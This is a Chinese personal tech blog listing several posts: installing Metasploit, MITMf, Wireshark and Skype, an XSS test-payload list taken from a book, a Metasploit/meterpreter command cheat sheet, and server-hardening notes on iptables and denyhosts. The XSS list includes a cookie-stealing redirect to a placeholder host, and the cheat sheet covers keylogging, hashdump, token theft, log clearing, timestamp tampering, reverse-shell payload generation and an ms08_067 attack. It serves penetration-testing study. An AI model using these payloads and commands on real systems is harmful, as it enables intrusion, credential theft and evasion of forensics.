centos7安装Metasploit框架

发布在 Centos

Metasploit应该不用多说了吧?Kali自带、Win和Mac都提供了现成的安装包,不过我莫名的对apt系不感冒,这里记录一下在centos7上安装metasploit框架的步骤,理论上yum系的都应该通用。
首先执行

1
2
3
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall

然后安装postgresql:

1
2
yum install postgresql
yum install postgresql-server

安装完成后先别启动服务,这里有个 关键的步骤 就是修改验证方式,编辑/var/lib/pgsql/data/pg_hba.conf文件,添加一行

1
2
host    "msf_database"	"msf_user"      127.0.0.1/32          md5
host all all 127.0.0.1/32 ident

保存后初始化数据库并启动服务,这里我直接就是root权限:

1
2
3
4
5
6
7
8
9
10
postgresql-setup initdb
systemctl start postgresql.service
su postgres
createuser msf_user -P
Enter password for new role: yourmsfpassword
Enter it again: yourmsfpassword
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n
createdb --owner=msf_user msf_database

然后切换回root用户,执行msfconsole:

1
2
3
4
5
6
7
8
9
10
msf> db_status
[*] postgresql selected, no connection
msf> db_connect msf_user:yourmsfpassword@127.0.0.1:5432/msf_database
NOTICE: CREATE TABLE will create implicit sequence "hosts_id_seq" for serial column "hosts.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "hosts_pkey" for table "hosts"
[..]
NOTICE: CREATE TABLE will create implicit sequence "mod_refs_id_seq" for serial column "mod_refs.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "mod_refs_pkey" for table "mod_refs"
msf > db_status
[*] postgresql connected to msf_database

然后就可以愉快的玩耍了。这里还有个地方需要注意的就是如果用上面的办法安装后执行了msfupdate,更新完成后再执行msfconsole会提示找不到命令,不知为什么/usr/bin目录下的链接被删除了,上面的安装方法将程序安装到了/opt/metasploit-framework/,所有的命令都在/opt/metasploit-framework/bin目录,可以自己重建链接。

另外,如果觉得每次进入msfconsole都要重新链接一次数据库麻烦的话,可以使用alias命令:

1
alias msfconsole='msfconsole -d db_connect -y /opt/framework/config/database.yml'

自己修改对应路径即可。

或者把database.yml放到~/.msf4目录中。

评论和分享

MacOS安装Wireshark-qt

发布在 Mac

大名鼎鼎的Wireshark不必多说,在win、linux系统中安装也都比较便捷,不过在网上大多写MacOS中如何安装的都狠麻烦,因为他们写的都是安装gtk版本的方式,而wireshark早就投入了qt阵营的怀抱了。

在brew中直接使用brew install wireshark --with-qt即可安装成功,不过安装后会提示:

1
2
3
4
5
6
7
8
9
10
11
> If your list of available capture interfaces is empty
> (default OS X behavior), try the following commands:
> curl https://bugs.wireshark.org/bugzilla/attachment.cgi?id=3373 -o ChmodBPF.tar.gz
> tar zxvf ChmodBPF.tar.gz
> open ChmodBPF/Install\ ChmodBPF.app
> This adds a launch daemon that changes the permissions of your BPF
> devices so that all users in the 'admin' group - all users with
> 'Allow user to administer this computer' turned on - have both read
> and write access to those devices.
> See bug report:
> https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=3760

就是由于某些原因Wireshark找不到网卡,按照上面提示解决后再启动即可。

这种方式安装完后的Wireshark是不会在LaunchPad中有图标的,想启动的话在终端中输入wireshark-qt即可启动gui界面版,tshark则启动命令行版。

评论和分享

fedora21安装MITMf框架

发布在 Linux

关于这大名鼎鼎的中间人攻击框架不多介绍了,如果是kali linux用户直接apt-get install mitmf即可;如果是win用户呢,基本就放弃吧;如果是os x用户呢,有几个依赖我始终安装失败,你要安装成功了请联系我。

网上很多都是讲ubuntu怎么安装这个框架的,这里我记录一下在fedora21上我的安装记录。

首先安装一些系统依赖,这里我系统原来就安装了很多杂七杂八的东西,不保证下面的就是齐全的:

1
2
3
sudo yum install libnetfilter_queue-devel
sudo yum install libffi-devel
sudo yum install libpcap-devel

接下来下载一个不能用pip安装的包

1
git clone https://github.com/fqrouter/python-netfilterqueue.git

然后进入目录中执行python setup.py install即可。

然后把mitmf框架下载下来

1
git clone https://github.com/byt3bl33d3r/MITMf.git

进入目录后,修改requirements.txt,我安装成功后所有的依赖如下,不保证时效。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
# NetfilterQueue==0.6  这个是手动安装的
Pillow==2.8.0
PyYAML==3.11
Twisted==15.0.0
capstone==3.0.2
cffi==0.9.2
characteristic==14.3.0
configobj==5.0.6
cryptography==0.8.1
dnspython==1.12.0
enum34==1.0.4
msgpack-python==0.4.6
pefile==1.2.10-114
pyOpenSSL==0.14
pyasn1==0.1.7
pyasn1-modules==0.0.5
pycparser==2.10
pypcap==1.1.1
requests==2.6.0
scapy==2.3.1
service-identity==14.0.0
six==1.9.0
ua-parser==0.3.6
user-agents==0.3.2
wsgiref==0.1.2
zope.interface==4.1.2

都安装完就可以了,如果安装某个包时报错xxx.h不存在,基本就是某个系统依赖的devel包没安装的问题,使用yum安装即可。还有一点,运行这个框架要用root权限。

1
2
3
4
5
6
7
8
9
10
11
12
(mitmfenv)┌─[cpu0@localhost] - [~/git/MITMf] - [5230]
└─[#] ./mitmf.py -h [14:43:41]
▄▄▄▄███▄▄▄▄ ▄█ ███ ▄▄▄▄███▄▄▄▄ ▄████████
▄██▀▀▀███▀▀▀██▄ ███ ▀█████████▄ ▄██▀▀▀███▀▀▀██▄ ███ ███
███ ███ ███ ███▌ ▀███▀▀██ ███ ███ ███ ███ █▀
███ ███ ███ ███▌ ███ ▀ ███ ███ ███ ▄███▄▄▄
███ ███ ███ ███▌ ███ ███ ███ ███ ▀▀███▀▀▀
███ ███ ███ ███ ███ ███ ███ ███ ███
███ ███ ███ ███ ███ ███ ███ ███ ███
▀█ ███ █▀ █▀ ▄████▀ ▀█ ███ █▀ ███
usage:
MITMf v0.9.5 - Framework for MITM attacks

评论和分享

xss测试用例

摘录于《XSS跨站脚本攻击剖析与防御》,希望大家支持正版,写的还是不错的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
<script>alert(1);</script>
<script>alert('xss');</script>
<script src="xxx://xxx.xxx"></script>
<script>location.href="xxx://xxx.xx/cookie="+escape(document.cookie)</script>
<scr<script>ipt>alert('xss');</scr<script>ipt>
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=xx.png onerror=alert(/xss/) />
<style>@im\port'\ja\vasc\ript:alert(\"xss\");</style>
<?echo('<scr)';echo('ipt>alert(\"xss\")</script>');?>
<marquee><script>alert('xss')</script></marquee>
<IMG SRC=\"jav&#x09;ascript:alert('xss');\">
<IMG SRC=\"jav&#x0A;ascript:alert('xss');\">
<IMG SRC=\"jav&#x0D;ascript:alert('xss');\">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
"<script>alert(0)</script>
<script src = xxx.xxx.js></script>
</title><script>alert(/xss/)</script>
</textarea><script>alert(/xss/)</script>
<IMG LOWSRC=\"javascript:alert('xss')\">
<IMG OYNSRC=\"javascript:alert('xss')\">
<font style='color:expression(alert(document.cookie))'>
');alert('xss
<img src="javascript:alert('xss')">
<script language="JavaScript">alert('xss')</script>
[url=javascript:alert('xss');]click me[/url]
<body onunload="javascript:alert('xss');">
<body onLoad="alert('xss');">
[color=red' onmouserover="alert('xss')"]mouser over[/color]
"/></a></><img src=1.gif onerror=alert(1)>
window.alert("xss");
<div style="x:expression((window.r==1)?"eval('r=1;alert(String.fromCharCode(88,83,83));'))">
<iframe<?php echo chr(11)?>onload=alert('xss')></iframe>
"><script alert(String.fromCharCode(88,83,83))</script>
'>><marquee><h1>xss</h1></marquee>
'">><marquee><h1>xss</h1></marquee>
'">><script>alert('xss')</script>
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('xss');\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;URL=http://;URL=javascript:alert('xss');\">
<script>var var = 1:alert(var)</script>
<STYLE type="text/css">BODY{background:url("javascript:alert('xss')")}</STYLE>
<?='<SCRIPT>alert("xss")</SCRIPT>'?>
<IMG SRC='vbscript:msgbox(\"xss\")'>
"onfocus=alert("xss")"><"
<FRAMESET><FRAME SRC=\"javascript:alert('xss');\"></FRAMESET>
<STYLE>li{list-style-image:url(\"javascript:alert('xss')\");}</SYTLE><UL><LI>XSS
<br size=\"&{alert('xss')}\">
<scrscriptipt>alert(1)</scrscriptipt>
</br style=a:expression(alert(1))>
</script><script>alert(1)</script>
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("xss")>
[color=red width=expression(alert(123))][color]
<BASE HREF="javascript:alert('xss');//">
Excute(<MsgBox(chr(88)&chr(83)&chr(83)))<
"></iframe><script>alert(1)</script>
<body onLoad="while(true) alert('xss');">
'"></title><script>alert(111)</script>
</textarea>'"><script>alert(document.cookie)</script>
'""><script language="JavaScript">alert(x \nS \nS);</script>
</script></script><<<<script><>>>><<<script>alert(123)</script>
<html><noalert><noscript>(123)</noscript><script>(123)</script>
<INPUT TYPE="IMAGE" SRC="javascript:alert('xss');">
'></script><script>alert(1)</script>
<script+src=">"+src="http://xx.xx/xx.js"></script>
'>"><script src = "xxx.xxx/xss.js"></script>
}</style><script>a=eval;b=alert;a(b(/xss/.source));</script>
<SCRIPT>document.write("xss")</SCRIPT>
a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
='><script>alert("xss")</script>
<body background=javascript:'"><script>alert(1)</script>></body>
">/XaDos/><script>alert(1)</script><script src="xxxx.xxxx/xx.js"></script>
Data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlenQoMTMzNyk8L3NjcmlwdD4=  
上面的解密后   "></title><script>alert(1337)</script> 注意utf-7
"<marquee><img src=x.png onerror=alert(1)/>
'"><marquee><img src=x.png onerror=alert(1)/>
</div><script>alert(1)</script>
"><iframe src='javascript:alert(1)'></iframe>
<div style="background:url('javascript:alert(1)')">
<img src='java\nscript:alert(1)'>
>"'><img src="javascript:alert(1)">
" style="background:url(javascript:alert(/xss/))"
>"><script>alert(/xss/)</script>
"></title><script>alert(1)</script>
'"</title><font color=red onmouseover=javascript:alert(1)>xss</font>
<SELECT NAME="" onmouerover=alert(1)></select>

评论和分享

iptables禁止某Ip

发布在 Centos

今天登录服务器一看,好家伙:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
tcp        0      0 198.74.121.150:80           38.103.160.12:33873         TIME_WAIT   -                   
tcp 0 0 198.74.121.150:80 38.103.160.12:45654 TIME_WAIT -
tcp 0 0 198.74.121.150:80 38.103.160.12:49337 TIME_WAIT -
tcp 0 0 198.74.121.150:80 38.103.160.12:35410 TIME_WAIT -
tcp 0 0 198.74.121.150:80 38.103.160.12:53982 TIME_WAIT -
tcp 0 0 198.74.121.150:80 38.103.160.12:55487 TIME_WAIT -
tcp 0 0 198.74.121.150:80 38.103.160.12:38964 TIME_WAIT -
tcp 0 0 198.74.121.150:80 38.103.160.12:39560 TIME_WAIT -
tcp 0 0 198.74.121.150:80 38.103.160.12:51861 TIME_WAIT -
tcp 0 0 198.74.121.150:80 38.103.160.12:60211 TIME_WAIT -
tcp 0 0 198.74.121.150:80 38.103.160.12:38490 TIME_WAIT -
tcp 0 0 198.74.121.150:80 38.103.160.12:48588 TIME_WAIT -
tcp 0 0 198.74.121.150:80 38.103.160.12:51625 TIME_WAIT -
tcp 0 0 198.74.121.150:80 38.103.160.12:47497 TIME_WAIT -
tcp 0 0 198.74.121.150:80 38.103.160.12:40164 TIME_WAIT -
tcp 0 0 198.74.121.150:80 38.103.160.12:42071 TIME_WAIT -
tcp 0 0 198.74.121.150:80 38.103.160.12:49687 TIME_WAIT -
tcp 0 0 198.74.121.150:80 38.103.160.12:59726 TIME_WAIT -
tcp 0 0 198.74.121.150:80 38.103.160.12:52097 TIME_WAIT -
tcp 0 0 198.74.121.150:80 38.103.160.12:46378 TIME_WAIT -

这尼玛绝对是非正常现象,想查看各个链接状态可以用下面的语句

1
netstat -n | awk '/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}'

结果如下:

1
TIME_WAIT 10968

我就呵呵了,看了一下这个ip,米国的,发现blocklist上面这个IP也上榜了

1
2
3
4
5
6
7
8
9
10
11
12
Date +-1 Min +0100:	Host:	                    Service:	    On Server:	        to:	Status:
15.11.2014 15:00:54 cpanel2.ospdx.com bruteforcelogin hacked-joomla/brobot blocked
15.11.2014 12:00:51 cpanel2.ospdx.com bruteforcelogin hacked-joomla/brobot blocked
14.11.2014 21:07:00 cpanel2.ospdx.com bruteforcelogin hacked-joomla/brobot blocked
14.11.2014 18:05:50 cpanel2.ospdx.com bruteforcelogin hacked-joomla/brobot 1 x blocked
12.11.2014 06:04:33 cpanel2.ospdx.com bruteforcelogin hacked-joomla/brobot blocked
12.11.2014 03:07:11 cpanel2.ospdx.com bruteforcelogin hacked-joomla/brobot blocked
12.11.2014 00:10:14 cpanel2.ospdx.com bruteforcelogin hacked-joomla/brobot blocked
11.11.2014 21:10:53 cpanel2.ospdx.com bruteforcelogin hacked-joomla/brobot blocked
11.11.2014 18:09:53 cpanel2.ospdx.com bruteforcelogin hacked-joomla/brobot blocked
11.11.2014 15:05:37 cpanel2.ospdx.com bruteforcelogin hacked-joomla/brobot blocked
11.11.2014 12:08:18 cpanel2.ospdx.com bruteforcelogin hacked-joomla/brobot 1 x blocked

没啥说的,直接封IP吧,执行
iptables -I INPUT -s ***.***.***.*** -j DROP

如果想解封某ip,把I换成D即可。

最后,可以使用
iptables --list
查看当前规则列表。

评论和分享

metasploit命令参考

发布在 Linux

节选自《metasploit渗透测试指南》

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
show  exploits 列出所有渗透攻击模块
show payloads 列出所有攻击载荷
show auxiliary 列出所有辅助模块
search name 搜索
info 列出详细信息
use name 使用
show options 查看参数

show targets 查看某模块支持的目标平台
show advanced 查看高级选项

set autorunscript migrate -f 攻击完成后自动迁移到另一个进程
check 检测目标是否对选定的渗透攻击存在相应的漏洞
exploit 执行渗透攻击
exploit -j 后台执行
exploit -z 成功渗透后不与会话交互
exploit -e encoder 指定攻击载荷编码方式
exploit -h 帮助

sessions -l 列出多个会话
sessions -l -v 列出会话同时列出详细信息
sessions -s scritp 在所有活跃会话中执行特定meterpreter脚本
sessions -K 杀死所有活跃会话
sessions -c cmd 在所有活跃会话上执行某命定
sessions -u sessionID 升级一个普通的win shell 到 meterpreter shell

db_conreate name 创建数据库
db_connect name 链接数据库
db_namp 把namp的扫描结果存入数据库  hosts services查看结果
db_autopwn -h
db_autopwn -p -r-e 对发现的所有端口执行db_autopwn
db_destroy 删除当前数据库
db_destory user:pswd@host:port/dbname
db_status 查看

meterpreter命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
help 帮助
run scriptname 运行meterpreter脚本, 在scripts/meterpreter目录
sysinfo列出受控住记系统信息
ls 列目录
use priv 扩展meterpreter库
ps 列进程
migrate PID 迁移
use incognito 加载incognito功能来盗取用户令牌
list_tokens -u 列出目标主机用户可用令牌
list_tokens -g 同上,列出用户组的
impersonate_token DOMAIN_NAME\\USERNAME
steal_token PID 到去给定进程的可用令牌进行假冒
drop_token 停止假冒令牌
getsystem 提权
shell 利用可用令牌运行shell
execute -f cmd.exe -i 执行cmd
execute -f cmd.exe -i -t  用可用令牌执行cmd

execute -f cmd.exe -i -H -t 用所有可用令牌执行cmd并隐藏该进程
rev2self 回到初始用户
reg commend 操作注册表
setdesktop number 切换用户界面
screenshot 屏幕截图
upload/download file 上传下载文件
keyscan_start/dump/stop  键盘记录
getprivs 提权??
uictl enable keyboart/mouse  操纵目标的键盘鼠标
background 将当前的seterpreter shell 转为后台执行
hashdump 导出目标主机口令hash值
use sniffer 加载嗅探模块
sniffer_interfaces 列出开放大端口
sniffer_dump interfaceID pcapname 启动嗅探
sniffer_start interfaceID packer-buffer 数据包缓冲区嗅探
sniffer_stats interfaceID 嗅探的统计数据
sniffer_stop interfaceID 停止嗅探
clearv 清除日志
timestomp 修改文件属性 反取证调查
reboot 重起


msfpayload命令

1
2
3
4
5
6
7
8
msfpayload -h 帮助
msfpayload windows/meterpreter/bind_tcp O 列出可用的攻击载荷
msfpayload windows/meterpreter/bind_tcp O. 列出可用的攻击载荷配置项
msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xx X > payload.exe 生成exe

msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xx R > payload.raw 生成raw原始文件,在msfencode中使用
msfpayload windows/meterpreter/bind_tcp LPORT=xx C > payload.c 生成c格式的shell code
msfpayload windows/meterpreter/bind_tcp LPORT=xx J > payload.java 生成javascript字符串


msfencode 命令

1
2
3
4
5
6
7
-h 帮助
-l 列出可用的编码器
-k 隐藏(不一定每次都可用)
msfencode -i raw文件 -o 输出文件名 -x 指定模板 -e 编码器 -c 次数 -t 生成什么格式
msfpayload windows/meterpreter/bind_tcp LPORT=xx R|msfencode -e x86/_countdown -c 5 -t raw| msfencode -e x86/shikata_ga_nai -c 5 -t exe -o mulit_encode.exe
多次编码示例
msfencode -i xx.raw BufferRedister=ESI -e x86/alpha_mixed -t c  创建一个纯数字字母的shellcode 由esi指向,c语言输出


msfcli命令

1
2
3
4
msfcli|gerp exploit 列出攻击模块
msfcli|grep exploit/windows 列出windows相关模块
msfcli expliot/windows/smb/ms08_067_netapi PAYLOAD= windows/meterpreter/bind_tcp LPORT=443 RHOST=x.x.x.x E
对目标发起netapi攻击 bind_tcp载荷 绑定443端口

评论和分享

centos安装denyhosts

发布在 Centos

最近不知道得罪了哪路大神,一直都有坏人暴力破解本站的SSH登录密码。想安安静静的写博客就这么难么…没办法,那就安个denyhosts吧。

centos下直接使用Yum安装即可:yum install denyhosts.noarch

当然也可以下载编译安装。安装好后,配置文件是/etc/denyhosts.conf,参数说明如下:

SECURE_LOG = /var/log/secure#ssh日志文件

HOSTS_DENY = /etc/hosts.deny #将阻止IP写入到hosts.deny

PURGE_DENY =30m#过多久后清除已阻止IP

BLOCK_SERVICE = sshd#阻止服务名

DENY_THRESHOLD_INVALID = 5//允许无效用户(在/etc/passwd未列出)登录失败次数,允许无效用户登录失败的次数.

DENY_THRESHOLD_VALID = 10#允许普通用户登录失败的次数

DENY_THRESHOLD_ROOT = 1//允许root登录失败的次数

DENY_THRESHOLD_RESTRICTED = 1#设定 deny host 写入到该资料夹

WORK_DIR = /usr/share/denyhosts/data #将deny的host或ip纪录到Work_dir中

SUSPICIOUS_LOGIN_REPORT_ALLOWED_HOSTS=YES

HOSTNAME_LOOKUP=YES #是否做域名反解

LOCK_FILE = /var/lock/subsys/denyhosts #将DenyHOts启动的pid纪录到LOCK_FILE中,已确保服务正确启动,防止同时启动多个服务。

ADMIN_EMAIL = a@b.com #设置管理员邮件地址

SMTP_HOST = localhost

SMTP_PORT = 25

SMTP_FROM = DenyHosts nobody@localhost

SMTP_SUBJECT = DenyHosts Report

AGE_RESET_VALID=5d

AGE_RESET_ROOT=25d

AGE_RESET_RESTRICTED=25d

AGE_RESET_INVALID=10d

DAEMON_LOG = /var/log/denyhosts#自己的日志文件

DAEMON_SLEEP = 30s

DAEMON_PURGE = 1h#该项与PURGE_DENY 设置成一样,也是清除hosts.deniedssh 用户的时间

配置完成后,启动服务并设置开机启动:

1
2
service denyhosts start
chkconfig denyhosts on

然后查看 /etc/hosts.deny 文件,发现里面已经有记录了:

1
2
3
4
5
6
7
8
9
10
11
12
13
[root@miss_yi ~]# tail /etc/hosts.deny
# DenyHosts: Mon Oct 20 17:19:38 2014 | ALL: 74.221.172.28
ALL: 74.221.172.28
# DenyHosts: Mon Oct 20 17:19:38 2014 | ALL: 117.21.173.175
ALL: 117.21.173.175
# DenyHosts: Mon Oct 20 17:19:38 2014 | ALL: 112.78.3.196
ALL: 112.78.3.196
# DenyHosts: Mon Oct 20 17:19:38 2014 | ALL: 181.143.230.74
ALL: 181.143.230.74
# DenyHosts: Mon Oct 20 17:19:38 2014 | ALL: 216.151.221.194
ALL: 216.151.221.194
[root@miss_yi ~]# wc /etc/hosts.deny
771 4628 30294 /etc/hosts.deny

评论和分享

nessus使用记录

发布在 Linux

至于介绍以及安装部分这里不再赘述,网上很多,可以直接下载rpm包进行安装。

fedora20安装后需要启动服务:sudo service nessusd start

浏览器访问 https://localhost:8834 即可看到nessus主界面。第一次使用时候需要注册码,翻墙去官方网站注册一个即可。

首先我们需要创建一个Policy,点击policies标签页后选择new policy,会弹出一个Policy Wizards 选择,这里我选择web application tests。

接下来就是填写关于Policy相关的信息,第一步就是填写名称、简介一类的信息,第二步则需要选择是快速扫描或者是深度扫描以及扫描开始的位置,这里我填写/,即从首页开始。

第三步比较重要,填写关于验证方面的相关信息,填写完成后点击save后就可以看到刚才建立的Policy了。

接下来选择Scans标签,新建一个Scan,填写一些名称、简介一类的基本信息,Policy中选择刚才建立的Policy,Targets中填写目标网站的URL或者IP段,左边的schedule settings中可设置扫描时间,一般使用默认的now。还可以设置email settings不过需要设置SMTP服务器相关信息,这里测试我就仅仅使用基本配置了。

接着点击lunch就开始扫描了,等待时间是几分钟到几个小时不定。

当扫描状态变成completed时,点击扫描即可进入结果页面,Vulnerabilities标签记录了详细信息,随意点击一条即可查看产生原因以及解决办法等详细信息。

评论和分享

64位kali安装skype

发布在 Kali

参考了debian7的安装方式,首先运行:

1
2
# dpkg --add-architecture i386
# apt-get update

最初的时候64位系统是无法安装32位程序的。

然后安装相关依赖:

1
apt-get -f install

下载32位skype并安装

1
2
# wget -O skype-install.deb http://www.skype.com/go/getskype-linux-deb
# dpkg -i skype-install.deb

评论和分享

  • 第 1 页 共 1 页
作者的图片

Roy

微信公众号:hi-roy


野生程序猿


China